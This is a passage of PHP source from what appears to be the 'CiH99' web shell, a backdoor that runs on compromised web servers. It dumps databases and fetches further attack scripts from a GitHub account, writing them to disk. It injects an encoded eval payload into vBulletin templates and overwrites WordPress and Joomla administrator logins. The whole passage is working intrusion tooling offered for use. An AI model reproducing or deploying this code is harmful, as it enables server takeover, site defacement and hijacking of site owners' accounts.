439 if (sizeof($tabs) == 0) {
440 //Retrieve tables-list
441 $res = mysql_query("SHOW TABLES FROM ".$db, $sock);
442 if (mysql_num_rows($res) > 0) {while ($row = mysql_fetch_row($res)) {$tabs[] = $row[0];}}
443 }
444 $out = "
445 # Dumped by ".$ch_name."
446 #
447 # Host settings:
448 # MySQL version: (".mysql_get_server_info().") running on ".getenv("SERVER_ADDR")." (".getenv("SERVER_NAME").")"."
449 # Date: ".date("d.m.Y H:i:s")."
450 # DB: \"".$db."\"
451 #---------------------------------------------------------";
452 $c = count($onlytabs);
453 foreach($tabs as $tab) {
454 if ((in_array($tab,$onlytabs)) or (!$c)) {
455 if ($add_drop) {$out .= "DROP TABLE IF EXISTS `".$tab."`;\n";}
456 //Receieve query for create table structure
457 $res = mysql_query("SHOW CREATE TABLE `".$tab."`", $sock);
458 if (!$res) {$ret["err"][] = mysql_smarterror();}
459 else {
460 $row = mysql_fetch_row($res);
461 $out .= $row["1"].";\n\n";
462 //Receieve table variables
463 $res = mysql_query("SELECT * FROM `$tab`", $sock);
464 if (mysql_num_rows($res) > 0) {
465 while ($row = mysql_fetch_assoc($res)) {
466 $keys = implode("`, `", array_keys($row));
467 $values = array_values($row);
468 foreach($values as $k=>$v) {$values[$k] = addslashes($v);}
469 $values = implode("', '", $values);
470 $sql = "INSERT INTO `$tab`(`".$keys."`) VALUES ('".$values."');\n";
471 $out .= $sql;
472 }
473 }
474 }
475 }
476 }
477 $out .= "#---------------------------------------------------------------------------------\n\n";
478 if ($file) {
479 $fp = fopen($file, "w");
480 if (!$fp) {$ret["err"][] = 2;}
481 else {
482 fwrite ($fp, $out);
483 fclose ($fp);
484 }
485 }
486 if ($print) {if ($nl2br) {echo nl2br($out);} else {echo $out;}}
487 return $out;
488 }
489 }
490 if (!function_exists("mysql_buildwhere")) {
491 function mysql_buildwhere($array,$sep=" and",$functs=array()) {
492 if (!is_array($array)) {$array = array();}
493 $result = "";
494 foreach($array as $k=>$v) {
495 $value = "";
496 if (!empty($functs[$k])) {$value .= $functs[$k]."(";}
497 $value .= "'".addslashes($v)."'";
498 if (!empty($functs[$k])) {$value .= ")";}
499 $result .= "`".$k."` = ".$value.$sep;
500 }
501 $result = substr($result,0,strlen($result)-strlen($sep));
502 return $result;
503 }
504 }
505 if (!function_exists("mysql_fetch_all")) {
506 function mysql_fetch_all($query,$sock) {
507 if ($sock) {$result = mysql_query($query,$sock);}
508 else {$result = mysql_query($query);}
509 $array = array();
510 while ($row = mysql_fetch_array($result)) {$array[] = $row;}
511 mysql_free_result($result);
512 return $array;
513 }
514 }
515 if (!function_exists("mysql_smarterror")) {
516 function mysql_smarterror($type,$sock) {
517 if ($sock) {$error = mysql_error($sock);}
518 else {$error = mysql_error();}
519 $error = htmlspecialchars($error);
520 return $error;
521 }
522 }
523 if (!function_exists("mysql_query_form")) {
524 function mysql_query_form() {
525 global $submit,$sql_act,$sql_query,$sql_query_result,$sql_confirm,$sql_query_error,$tbl_struct;
526 if (($submit) and (!$sql_query_result) and ($sql_confirm)) {if (!$sql_query_error) {$sql_query_error = "Query was empty";} echo "<b>Error:</b> <br>".$sql_query_error."<br>";}
527 if ($sql_query_result or (!$sql_confirm)) {$sql_act = $sql_goto;}
528 if ((!$submit) or ($sql_act)) {
529 echo "<table border=0><tr><td><form name=\"cih99_sqlquery\" method=POST><b>"; if (($sql_query) and (!$submit)) {echo "Do you really want to";} else {echo "SQL-Query";} echo ":</b><br><br><textarea name=sql_query cols=100 rows=10>".htmlspecialchars($sql_query)."</textarea><br><br><input type=hidden name=act value=sql><input type=hidden name=sql_act value=query><input type=hidden name=sql_tbl value=\"".htmlspecialchars($sql_tbl)."\"><input type=hidden name=submit value=\"1\"><input type=hidden name=\"sql_goto\" value=\"".htmlspecialchars($sql_goto)."\"><input type=submit name=sql_confirm value=\"Yes\"> <input type=submit value=\"No\"></form></td>";
530 if ($tbl_struct) {
531 echo "<td valign=\"top\"><b>Fields:</b><br>";
532 foreach ($tbl_struct as $field) {$name = $field["Field"]; echo "+ <a href=\"#\" onclick=\"document.cih99_sqlquery.sql_query.value+='`".$name."`';\"><b>".$name."</b></a><br>";}
533 echo "</td></tr></table>";
534 }
535 }
536 if ($sql_query_result or (!$sql_confirm)) {$sql_query = $sql_last_query;}
537 }
538 }
539 if (!function_exists("mysql_create_db")) {
540 function mysql_create_db($db,$sock="") {
541 $sql = "CREATE DATABASE `".addslashes($db)."`;";
542 if ($sock) {return mysql_query($sql,$sock);}
543 else {return mysql_query($sql);}
544 }
545 }
546 if (!function_exists("mysql_query_parse")) {
547 function mysql_query_parse($query) {
548 $query = trim($query);
549 $arr = explode (" ",$query);
550 $types = array(
551 "SELECT"=>array(3,1),
552 "SHOW"=>array(2,1),
553 "DELETE"=>array(1),
554 "DROP"=>array(1)
555 );
556 $result = array();
557 $op = strtoupper($arr[0]);
558 if (is_array($types[$op])) {
559 $result["propertions"] = $types[$op];
560 $result["query"] = $query;
561 if ($types[$op] == 2) {
562 foreach($arr as $k=>$v) {
563 if (strtoupper($v) == "LIMIT") {
564 $result["limit"] = $arr[$k+1];
565 $result["limit"] = explode(",",$result["limit"]);
566 if (count($result["limit"]) == 1) {$result["limit"] = array(0,$result["limit"][0]);}
567 unset($arr[$k],$arr[$k+1]);
568 }
569 }
570 }
571 }
572 else {return FALSE;}
573 }
574 }
575 if ($act == "gofile") {
576 if (is_dir($f)) { $act = "ls"; $d = $f; }
577 else { $act = "f"; $d = dirname($f); $f = basename($f); }
578 }
579 ## HEADERS ##
580 @ob_start();
581 @ob_implicit_flush(0);
582 header("Expires: Mon, 26 Jul 1997 05:00:00 GMT");
583 header("Last-Modified: ".gmdate("D, d M Y H:i:s")." GMT");
584 header("Cache-Control: no-store, no-cache, must-revalidate");
585 header("Cache-Control: post-check=0, pre-check=0", FALSE);
586 header("Pragma: no-cache");
587 if (empty($tmpdir)) {
588 $tmpdir = ini_get("upload_tmp_dir");
589 if (is_dir($tmpdir)) {$tmpdir = "/tmp/";}
590 }
591 $tmpdir = realpath($tmpdir);
592 $tmpdir = str_replace("\\",DIRECTORY_SEPARATOR,$tmpdir);
593 if (substr($tmpdir,-1) != DIRECTORY_SEPARATOR) {$tmpdir .= DIRECTORY_SEPARATOR;}
594 if (empty($tmpdir_logs)) {$tmpdir_logs = $tmpdir;}
595 else {$tmpdir_logs = realpath($tmpdir_logs);}
596 $sort = htmlspecialchars($sort);
597 if (empty($sort)) {$sort = $sort_default;}
598 $sort[1] = strtolower($sort[1]);
599 $DISP_SERVER_SOFTWARE = getenv("SERVER_SOFTWARE");
600 if (!ereg("PHP/".phpversion(),$DISP_SERVER_SOFTWARE)) {$DISP_SERVER_SOFTWARE .= ". PHP/".phpversion();}
601 $DISP_SERVER_SOFTWARE = str_replace("PHP/".phpversion(),"<a href=\"".$surl."act=phpinfo\" target=\"_blank\"><b><u>PHP/".phpversion()."</u></b></a>",htmlspecialchars($DISP_SERVER_SOFTWARE));
602 @ini_set("highlight.bg",$highlight_bg);
603 @ini_set("highlight.comment",$highlight_comment);
604 @ini_set("highlight.default",$highlight_default);
605 @ini_set("highlight.html",$highlight_html);
606 @ini_set("highlight.keyword",$highlight_keyword);
607 @ini_set("highlight.string",$highlight_string);
608 if (!is_array($actbox)) { $actbox = array(); }
609 $dspact = $act = htmlspecialchars($act);
610 $disp_fullpath = $ls_arr = $notls = null;
611 $ud = @urlencode($d);
612 if (empty($d)) {$d = realpath(".");}
613 elseif(realpath($d)) {$d = realpath($d);}
614 $d = str_replace("\\",DIRECTORY_SEPARATOR,$d);
615 if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;}
616 $d = str_replace("\\\\","\\",$d);
617 $dispd = htmlspecialchars($d);
618 $safemode = safemode();
619 if ($safemode) {
620 $hsafemode = "<font color=#3366FF><b>SAFE MODE IS ON</b></font>";
621 $safemodeexecdir = @ini_get("safe_mode_exec_dir");
622 }
623 else { $hsafemode = "<font color=#FF9900><b>SAFE MODE IS OFF</b></font>"; }
624 $v = @ini_get("open_basedir");
625 if ($v or strtolower($v) == "on") {
626 $openbasedir = TRUE;
627 $hopenbasedir = "<font color=red>".$v."</font>";
628 }
629 else {
630 $openbasedir = FALSE;
631 $hopenbasedir = "<font color=green>OFF (not secure)</font>";
632 }
633
634##################
635##[ HTML START ]##
636##################
637 function srv_info($title,$contents) {
638 echo "<tr><th>$title</th><td>:</td><td>$contents</td></tr>\n";
639 }
640 echo htmlhead($hsafemode);
641 echo "<table id=pagebar>";
642 echo "<tr><td colspan=2>\n";
643 echo "<div class=fleft>$hsafemode</div>\n";
644 echo "<div class=fright>";
645 echo "IP Address: <a href=\"http://ws.arin.net/cgi-bin/whois.pl?queryinput=".@gethostbyname($_SERVER["HTTP_HOST"])."\">".@gethostbyname($_SERVER["HTTP_HOST"])."</a> ".
646 "You: <a href=\"http://ws.arin.net/cgi-bin/whois.pl?queryinput=".$_SERVER["REMOTE_ADDR"]."\">".$_SERVER["REMOTE_ADDR"]."</a> ".
647 ($win?"Drives: ".disp_drives($d,$surl):"");
648 echo "</div>\n</td></tr>\n";
649 echo "<tr><td width=50%>\n";
650 echo "<table class=info>\n";
651 srv_info("Software","".$DISP_SERVER_SOFTWARE);
652 srv_info("Uname",php_uname());
653 srv_info("User",($win) ? get_current_user()." (uid=".getmyuid()." gid=".getmygid().")" : ch99exec("id"));
654 echo "</table></td>\n".
655 "<td width=50%>\n";
656 echo "<table class=info>\n";
657 srv_info("Freespace",disp_freespace($d));
658 echo "</table></td></tr>\n";
659 echo "<tr><td colspan=2>\n";
660 echo get_status();
661 echo "</td></tr>\n";
662 echo "<tr><td colspan=2>\n";
663 echo $safemodeexecdir ? "SafemodeExecDir: ".$safemodeexecdir."<br>\n" : "";
664 echo showdisfunc() ? "Disabled Functions: ".showdisfunc()."\n" : "";
665 echo "</td></tr>\n";
666 echo "<tr><td colspan=2 id=mainmenu>\n";
667 if (count($quicklaunch2) > 0) {
668 foreach($quicklaunch2 as $item) {
669 $item[1] = str_replace("%d",urlencode($d),$item[1]);
670 $item[1] = str_replace("%sort",$sort,$item[1]);
671 $v = realpath($d."..");
672 if (empty($v)) {
673 $a = explode(DIRECTORY_SEPARATOR,$d);
674 unset($a[count($a)-2]);
675 $v = join(DIRECTORY_SEPARATOR,$a);
676 }
677 $item[1] = str_replace("%upd",urlencode($v),$item[1]);
678 echo "<a href=\"".$item[1]."\">".$item[0]."</a>\n";
679 }
680 }
681 echo "</td>\n".
682 "<tr><td colspan=2 id=mainmenu>\n";
683 if (count($quicklaunch1) > 0) {
684 foreach($quicklaunch1 as $item) {
685 $item[1] = str_replace("%d",urlencode($d),$item[1]);
686 $item[1] = str_replace("%sort",$sort,$item[1]);
687 $v = realpath($d."..");
688 if (empty($v)) {
689 $a = explode(DIRECTORY_SEPARATOR,$d);
690 unset($a[count($a)-2]);
691 $v = join(DIRECTORY_SEPARATOR,$a);
692 }
693 $item[1] = str_replace("%upd",urlencode($v),$item[1]);
694 echo "<a href=\"".$item[1]."\">".$item[0]."</a>\n";
695 }
696 }
697 echo "</td></tr>\n<tr><td colspan=2>";
698 echo "<p class=fleft>\n";
699 $pd = $e = explode(DIRECTORY_SEPARATOR,substr($d,0,-1));
700 $i = 0;
701 foreach($pd as $b) {
702 $t = ""; $j = 0;
703 foreach ($e as $r) {
704 $t.= $r.DIRECTORY_SEPARATOR;
705 if ($j == $i) { break; }
706 $j++;
707 }
708 echo "<a href=\"".$surl."act=ls&d=".urlencode($t)."&sort=".$sort."\"><font color=yellow>".htmlspecialchars($b).DIRECTORY_SEPARATOR."</font></a>\n";
709 $i++;
710 }
711 echo " - ";
712 if (is_writable($d)) {
713 $wd = TRUE;
714 $wdt = "<font color=#00FF00>[OK]</font>";
715 echo "<b><font color=green>".view_perms(fileperms($d))."</font></b>";
716 }
717 else {
718 $wd = FALSE;
719 $wdt = "<font color=red>[Read-Only]</font>";
720 echo "<b>".view_perms_color($d)."</b>";
721 }
722 echo "\n</p>\n";
723 ?>
724 <div class=fright>
725 <form method="POST"><input type=hidden name=act value="ls">
726 Directory: <input type="text" name="d" size="50" value="<?php echo $dispd; ?>"> <input type=submit value="Go">
727 </form>
728 </div>
729 </td></tr></table>
730 <?php
731 /***********************/
732 /** INFORMATION TABLE **/
733 /***********************/
734 echo "<table id=maininfo><tr><td width=\"100%\">\n";
735 if ($act == "") { $act = $dspact = "ls"; }
736//Begin of SQL Manager
737 if ($act == "sql") {
738 @mkdir('MySQL');
739 @mkdir('Indexer');
740 echo '<form method="POST"><p><b>.: Select MySQL Tool :.</b></p><p>
741<select name="MySQL_type">
742<option value="sqlcih">MySQL CiH99 Manager</option>
743<option value="sqlInterface">MySQL Interface</option>
744<option value="mohajer1">MySQL Mohajer1</option>
745<option value="mohajer2">MySQL Mohajer2</option>
746<option value="egysql">MySQL EgY</option>
747<option value="backupsql1">MySQL Backup</option>
748<option value="backupsql2">MySQL Backup++</option>
749<option value="cih_backup_restor">MySQL cih backup restor</option>
750<option value="wp">Change Admin WordPress</option>
751<option value="joom">Change Admin Joomla</option>
752<option value="indexerV2">Change Indexer V2.0</option>
753<option value="VBInject">VBInject CiH99</option>
754<option value="VBindex">VBindex CiH99</option>
755<option value="cihic">CiH-Info ChangeV2</option>
756<option value="cihin">CiH-index ChangeV2</option>
757<option value="majrm">VB-M0GrM</option>
758<option value="vbcih">VB-CiH</option>
759<option value="vbshell">VB-MA3REFAH</option>
760<option value="Pain">Pain Indexer</option>
761</select>
762<input type="submit" value="Go" />
763</p> </form>';
764
765
766 if ($_POST['MySQL_type'] == 'sqlInterface'){
767 chdir('MySQL');
768 $mysql1=file_get_contents('https://raw.githubusercontent.com/CiH777/sql/master/MSQL');
769 $file = fopen("MSQL.PHP" ,"w+");
770 $write = fwrite ($file ,$mysql1);
771 fclose($file);
772 echo "</br><a href='MySQL/MSQL.PHP' target='_blank'> Go To [MySQL Interface] </a>";
773 }
774 if ($_POST['MySQL_type'] == 'mohajer1'){
775 chdir('MySQL');
776 $mysql2=file_get_contents('https://raw.githubusercontent.com/CiH777/sql/master/Mohajer22');
777 $file = fopen("Mohajer22.php" ,"w+");
778 $write = fwrite ($file ,$mysql2);
779 fclose($file);
780 echo "</br><a href='MySQL/Mohajer22.php' target='_blank'> Go To [MySQL Mohajer1] </a>";
781 }
782 if ($_POST['MySQL_type'] == 'mohajer2'){
783 chdir('MySQL');
784 $mysql3=file_get_contents('https://raw.githubusercontent.com/CiH777/sql/master/Mohajer22_d');
785 $file = fopen("Mohajer22_d.php" ,"w+");
786 $write = fwrite ($file ,$mysql3);
787 fclose($file);
788 echo "</br><a href='MySQL/Mohajer22_d.php' target='_blank'> Go To [MySQL Mohajer2] </a>";
789 }
790 if ($_POST['MySQL_type'] == 'egysql'){
791 chdir('MySQL');
792 $mysql4=file_get_contents('https://raw.githubusercontent.com/CiH777/sql/master/EgY_sql');
793 $file = fopen("EgY_sql.php" ,"w+");
794 $write = fwrite ($file ,$mysql4);
795 fclose($file);
796 echo "</br><a href='MySQL/EgY_sql.php' target='_blank'> Go To [MySQL EgY] </a>";
797 }
798 if ($_POST['MySQL_type'] == 'backupsql1'){
799 chdir('MySQL');
800 $mysql5=file_get_contents('https://raw.githubusercontent.com/CiH777/sql/master/backupsql');
801 $file = fopen("backupsql.txt" ,"w+");
802 $write = fwrite ($file ,$mysql5);
803 fclose($file);
804 echo "</br><a href='MySQL/backupsql.txt' target='_blank'> Go To [MySQL Backup] </a>";
805 }
806 if ($_POST['MySQL_type'] == 'backupsql2'){
807 $mysql6=file_get_contents('https://raw.githubusercontent.com/CiH777/sql/master/backup');
808 $file = fopen("backup.php" ,"w+");
809 $write = fwrite ($file ,$mysql6);
810 fclose($file);
811 echo "</br><a href='backup.php' target='_blank'> Go To [MySQL Backup++] </a>";
812 }
813 if ($_POST['MySQL_type'] == 'cih_backup_restor'){
814 chdir('MySQL');
815 $mysql5=file_get_contents('https://raw.githubusercontent.com/CiH777/sql/master/cih_backup_restor');
816 $file = fopen("cih_backup_restor.txt" ,"w+");
817 $write = fwrite ($file ,$mysql5);
818 fclose($file);
819 echo "</br><a href='MySQL/cih_backup_restor.txt' target='_blank'> Go To [MySQL cih backup restor] </a>";
820 }
821
822 if ($_POST['MySQL_type'] == 'indexerV2'){
823 chdir('Indexer');
824 $indexer1=file_get_contents('https://raw.githubusercontent.com/CiH777/sql/master/indexerV2');
825 $file = fopen("indexerV2.0.php" ,"w+");
826 $write = fwrite ($file ,$indexer1);
827 fclose($file);
828 echo "</br><a href='Indexer/indexerV2.0.php' target='_blank'> Go To [Change Indexer V2.0] </a>";
829 }
830 if ($_POST['MySQL_type'] == 'cihic'){
831 chdir('Indexer');
832 $indexer2=file_get_contents('https://raw.githubusercontent.com/CiH777/sql/master/cih-ic');
833 $file = fopen("cih-ic.php" ,"w+");
834 $write = fwrite ($file ,$indexer2);
835 fclose($file);
836 echo "</br><a href='Indexer/cih-ic.php' target='_blank'> Go To [CiH-Info ChangeV2] </a>";
837 }
838 if ($_POST['MySQL_type'] == 'cihin'){
839 chdir('Indexer');
840 $indexer3=file_get_contents('https://raw.githubusercontent.com/CiH777/sql/master/cih-indexc');
841 $file = fopen("cih-indexc.php" ,"w+");
842 $write = fwrite ($file ,$indexer3);
843 fclose($file);
844 echo "</br><a href='Indexer/cih-indexc.php' target='_blank'> Go To [CiH-index ChangeV2] </a>";
845 }
846 if ($_POST['MySQL_type'] == 'majrm'){
847 chdir('Indexer');
848 $indexer4=file_get_contents('https://raw.githubusercontent.com/CiH777/sql/master/majrm');
849 $file = fopen("majrm.php" ,"w+");
850 $write = fwrite ($file ,$indexer4);
851 fclose($file);
852 echo "</br><a href='Indexer/majrm.php' target='_blank'> Go To [VB-M0GrM] </a>";
853 }
854 if ($_POST['MySQL_type'] == 'vbcih'){
855 chdir('Indexer');
856 $indexer5=file_get_contents('https://raw.githubusercontent.com/CiH777/sql/master/vbcih');
857 $file = fopen("vbcih.php" ,"w+");
858 $write = fwrite ($file ,$indexer5);
859 fclose($file);
860 echo "</br><a href='Indexer/vbcih.php' target='_blank'> Go To [VB-CiH] </a>";
861 }
862 if ($_POST['MySQL_type'] == 'vbshell'){
863 chdir('Indexer');
864 $indexer6=file_get_contents('https://raw.githubusercontent.com/CiH777/sql/master/vbshell');
865 $file = fopen("vbshell.php" ,"w+");
866 $write = fwrite ($file ,$indexer6);
867 fclose($file);
868 echo "</br><a href='Indexer/vbshell.php' target='_blank'> Go To [VB-MA3REFAH] </a>";
869 }
870 if ($_POST['MySQL_type'] == 'Pain'){
871 chdir('Indexer');
872 $indexer7=file_get_contents('https://raw.githubusercontent.com/CiH777/sql/master/Pain');
873 $file = fopen("Pain.php" ,"w+");
874 $write = fwrite ($file ,$indexer7);
875 fclose($file);
876 echo "</br><a href='Indexer/Pain.php' target='_blank'> Go To [Pain Indexer] </a>";
877 }
878
879// VB CiH99 Tools
880 if ($_POST['MySQL_type'] == 'VBInject'){
881 echo '
882:::VB CiH99 Shell Inject:::</b></p>';
883 if (empty($_POST[db])){
884 print '
885<form name="frm" action="" method="POST" onsubmit="document.frm.code.value = encode64(document.frm.code.value)">
886<br>
887Inject To :<br><select size="1" name="template">
888<option value="FAQ">FAQ.PHP</option>
889<option value="FORUMHOME">FORUMHOME</option>
890<option value="search_forums">search forums</option>
891<option value="SHOWGROUPS">SHOWGROUPS</option>
892<option value="SHOWTHREAD">SHOWTHREAD.PHP</option>
893<option value="CALENDAR">CALENDAR.PHP</option>
894<option value="MEMBERINFO">MEMBERINFO</option>
895<option value="footer">footer</option>
896<option value="header">header</option>
897<option value="headinclude">headinclude</option>
898<option value="lostpw">lostpw</option>
899<option value="memberlist">memberlist</option></select></p>
900<br> Host : <br><input name="lo" type="text" value="localhost" align="LEFT" size="18">
901<br>DataBase Name: <br><input name="db" type="text" align="LEFT" size="18" >
902<br>User Name :<br><input name="user" type="text" align="LEFT" size="15" >
903<br>Password :<br><input name="pass" type="text" align="MIDDLE" size="15" >
904<br>Table Prefix :<br><input name="tab" type="text" align="LEFT" size="15" >
905<br><input type="submit" value="Inject"/>';
906 }else{
907 $a ="{\${eval(gzuncompress(gzinflate(base64_decode(\'";
908 $code ='AUMDvPx4nE2TSY+bWACE7yPlP7RaLaVbZAaDAUOiOWAWG8xizM5lxPLAjx0eGMOvj3ObOtSlvlKd6iPtMvD279t3PiqECCeoViFckhwT63jkuJrTayTGrowqp8YhEYd1L9ysWD/3NrW7xWTlatxpIms3VjEnn5+5WjbYHdzPselnzYa2G4KIb1wNN1SJuAuyZbaFjC/SdTBN3A7YpXDAFQYHrDEO11jemtkubLMDTtmJ15OUMZ5/DgvwVDtOynaPSnKK3bjX0cKHa9BbkxnwZC+bI6ZOXMFfMAy7RJKtM8o1iNwptRAk1yU5mFRUys7FMKb1UR3Wqu838UGdRs4JsUWpveNFw6bGwCsTU9RdHkeG5E+RPIT1kDhDgncJLuXXIw5nMj3d6A7fZhTuN92wZwgjEWR7SUECrDWxzFgAT4p8SC5KlJXtljCcsqOWEXcu5nxN9jlIBq9BgRh6bTJDDrWaSq3xBU5yUTXuWmx7JJoDu3bD7UQjFlVMsrNEc+rPILxlzbk2t+BUsV6VNM8LSWl4LJXHibpDz+4R8g9ysWQNpMcQ+WKf8mUTA9fxfcHLy0aeYn4axYCXGGb/QD7NZJPgttZ6ZvDG5DsdiGW7A3CZmOdzJXS0CoB48OOzdSBKmE2OPIUgn64Ks5veXgQnS6G4mIobPcfOeDzYMwwfe1+uo5oVnPXY6RpeBrc+XTLb8jGjuFPHet8WfsLa19TMcwzni43ud85ESOYpKI4Yo3qIhXUFiK06x3wwpuKRpG1NO5a0KTSl5K8G2cZB2UrKuGyLTawPa/BDv4tJoztP1nxXmzOaB5muyDqC3nBIkSHFkmTQ3l4khLjO76dJjV61tsP6URA5oHYXimaMfU6xPjgfKEtOgjlbJD1erz1IAszh+nk98bNh+KlQl36jePUQeLtTCRO81EemCHl/SlraeiqTXkusVDKHesxvhygfn/SDMbi1XM0USeoiJ3a3uVoJ8UXkboXQf//17a+PvH/dMO960H6+p/D+N2zLf/p7//7jfcHev15EvoxwAp8v8EexzW3aNf0IEPosNtjmdfyKkhgBhvovA39O/fnxx79eenXvIM7A+PmudWk8wa79+fb/ia9fvwG7cVvv';
909 $template =$_POST['template'];
910 @mysql_connect($_POST['lo'],$_POST['user'],$_POST['pass']) or die(mysql_error());
911 @mysql_select_db($_POST['db']) or die(mysql_error());
912 $p = "UPDATE ".$_POST[tab]."template SET template ='".$a.$code."\'))}}{\${exit()}}&' WHERE title ='".$template."'";
913 $cihvb= @mysql_query($p) or die(mysql_error());
914 if ($cihvb){print'The change was successfully <br> Shell Injected in '.$template;}
915 }
916 print $f;
917
918 }
919
920 if ($_POST['MySQL_type'] == 'VBindex'){
921 echo '
922:::VB CiH99 Indexer:::</b></p>';
923 if (!$_POST[code]){
924 print '
925<form name="frm" action="" method="POST" onsubmit="document.frm.code.value = vb(document.frm.code.value)">
926Change index BY:<br><select size="1" name="t">
927<option value="spacer_open">SPACER_OPEN</option>
928<option value="spacer_close">SPACER_CLOSE</option>
929</select></p>
930<br> Host :<br><input name="lo" type="text" value="localhost" align="LEFT" size="18"/>
931<br>DataBase Name: <br><input name="db" type="text" align="LEFT" size="18" ><Br>
932<br>User Name :<br><input name="user" type="text" align="LEFT" size="15">
933<br>Password :<br><input name="pass" type="text" align="MIDDLE" size="15">
934<br>Table Prefix :<br><input name="tab" type="text" align="LEFT" size="15">
935<br>index code[HTML]<br><textarea name="code" cols="41" rows="15" wrap="VIRTUAL" ></textarea><br>
936<input type="submit" value="Change index" />';
937 }else{
938 $lost = $_POST[t];
939 $a ="{\${eval(base64_decode(\'";
940 $cih_index = base64_encode('echo "'.$_POST[code].'</body></html>";exit;');
941 @mysql_connect($_POST['lo'],$_POST['user'],$_POST['pass']) or die(mysql_error());
942 @mysql_select_db($_POST['db']) or die(mysql_error());
943 $p = "UPDATE ".$_POST[tab]."template SET template ='".$a.$tkl_index."\'))}}' WHERE title ='".$lost."'";
944 $cihvb= @mysql_query($p) or die(mysql_error());
945 if ($cihvb){print"The change was successfully ";}
946 }
947 print $f;
948 }
949//End VB CiH99 Tools
950 if ($_POST['MySQL_type'] == 'wp'){ echo '<FORM method="POST"> :::WordPress DataBase info:::<br> host :<br> <INPUT size="15" value="localhost" name="localhost" type="text"> <br>database :<br> <INPUT size="15" value="" name="database" type="text"><br> <br>Table Prefix :<br> <INPUT size="15" value="wp_" name="prefix" type="text"><br> <br>username : <br><INPUT size="15" value="" name="username" type="text"> <br>password : <br><INPUT size="15" value="" name="password" type="password"><br> <br>:::Admin info::: <br>New username:<br> <INPUT name="admin" size="15" value="admin"><br> New password:<br> <INPUT name="pwd" size="15" value="cih"><br> New Email:<br> <INPUT name="email" size="15" value="cih_hacker@yahoo.com"><br> <INPUT value="change wp-admin" name="send" type="submit"> </FORM>'; } if ($_POST['send'] == 'change wp-admin'){ $localhost = $_POST['localhost']; $database = $_POST['database']; $username = $_POST['username']; $password = $_POST['password']; $pwd = $_POST['pwd']; $admin = $_POST['admin']; $SQL = $_POST['email']; $prefix = $_POST['prefix']; @mysql_connect($localhost,$username,$password) or die(mysql_error()); @mysql_select_db($database) or die(mysql_error()); $hash = crypt($pwd); $cih1=@mysql_query("UPDATE ".$prefix."users SET user_login ='".$admin."' WHERE ID = 1") or die(mysql_error()); $cih1=@mysql_query("UPDATE ".$prefix."users SET user_pass ='".$hash."' WHERE ID = 1") or die(mysql_error()); $cih1=@mysql_query("UPDATE ".$prefix."users SET user_login ='".$admin."' WHERE ID = 2") or die(mysql_error()); $cih1=@mysql_query("UPDATE ".$prefix."users SET user_pass ='".$hash."' WHERE ID = 2") or die(mysql_error()); $cih1=@mysql_query("UPDATE ".$prefix."users SET user_login ='".$admin."' WHERE ID = 3") or die(mysql_error()); $cih1=@mysql_query("UPDATE ".$prefix."users SET user_pass ='".$hash."' WHERE ID = 3") or die(mysql_error()); $cih1=@mysql_query("UPDATE ".$prefix."users SET user_email ='".$SQL."' WHERE ID = 1") or die(mysql_error()); if($cih1){ echo "<b> The change was successfully</b> "; } }
951 if ($_POST['MySQL_type'] == 'joom'){ echo '<FORM method="POST"> :::Joomla DataBase info:::<br> host :<br> <INPUT size="15" value="localhost" name="localhost" type="text"> <br>database :<br> <INPUT size="15" value="" name="database" type="text"><br> <br>Table Prefix :<br> <INPUT size="15" value="jos_" name="prefix" type="text"><br> <br>username : <br><INPUT size="15" value="" name="username" type="text"> <br>password : <br><INPUT size="15" value="" name="password" type="password"><br> <br>:::Admin info::: <br>New username:<br> <INPUT name="admin" size="15" value="admin"><br> New password:<br> <INPUT name="pwd" size="15" value="cih"><br> New Email:<br> <INPUT name="email" size="15" value="cih_hacker@yahoo.com"><br> <INPUT value="change administrator" name="send" type="submit"> </FORM>'; } if ($_POST['send'] == 'change administrator'){ $localhost = $_POST['localhost']; $database = $_POST['database']; $username = $_POST['username']; $password = $_POST['password']; $pwd = $_POST['pwd']; $admin = $_POST['admin']; $SQL = $_POST['email']; $prefix = $_POST['prefix']; @mysql_connect($localhost,$username,$password) or die(mysql_error()); @mysql_select_db($database) or die(mysql_error()); $hash = md5($pwd); $cih1=@mysql_query("UPDATE ".$prefix."users SET username ='".$admin."' WHERE username = 'admin'") or die(mysql_error()); $cih1=@mysql_query("UPDATE ".$prefix."users SET password ='".$hash."' WHERE username = 'admin'") or die(mysql_error()); $cih1=@mysql_query("UPDATE ".$prefix."users SET username ='".$admin."' WHERE usertype = 'deprecated'") or die(mysql_error()); $cih1=@mysql_query("UPDATE ".$prefix."users SET password ='".$hash."' WHERE usertype = 'deprecated'") or die(mysql_error()); $cih1=@mysql_query("UPDATE ".$prefix."users SET username ='".$admin."' WHERE usertype = 'Super Administrator'") or die(mysql_error()); $cih1=@mysql_query("UPDATE ".$prefix."users SET password ='".$hash."' WHERE usertype = 'Super Administrator'") or die(mysql_error()); $cih1=@mysql_query("UPDATE ".$prefix."users SET email ='".$SQL."' WHERE username = 'admin'") or die(mysql_error()); if($cih1){ echo "<b> The change was successfully</b> "; } }
952//MySQL CiH99 Manager
953 $sql_surl = $surl."act=sql";
954 if ($sql_login) {$sql_surl .= "&sql_login=".htmlspecialchars($sql_login);}
955 if ($sql_passwd) {$sql_surl .= "&sql_passwd=".htmlspecialchars($sql_passwd);}
956 if ($sql_server) {$sql_surl .= "&sql_server=".htmlspecialchars($sql_server);}
957 if ($sql_port) {$sql_surl .= "&sql_port=".htmlspecialchars($sql_port);}
958 if ($sql_db) {$sql_surl .= "&sql_db=".htmlspecialchars($sql_db);}
959 $sql_surl .= "&";
960 echo "<h4><u></u></h4>".
961 "<table>".
962 "<tr><td width=\"100%\" colspan=2 class=barheader>";
963 if ($sql_server) {
964 $sql_sock = mysql_connect($sql_server.":".$sql_port, $sql_login, $sql_passwd);
965 $err = mysql_smarterror();
966 @mysql_select_db($sql_db,$sql_sock);
967 if ($sql_query and $submit) {$sql_query_result = mysql_query($sql_query,$sql_sock); $sql_query_error = mysql_smarterror();}
968 }
969 else {$sql_sock = FALSE;}
970 echo ".: SQL CiH99 Manager :.<br>";
971 if (!$sql_sock) {
972 if (!$sql_server) {echo "NO CONNECTION";}
973 else {echo "Can't connect! ".$err;}
974 }
975 else {
976 $sqlquicklaunch = array();
977 $sqlquicklaunch[] = array("Index",$surl."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&");
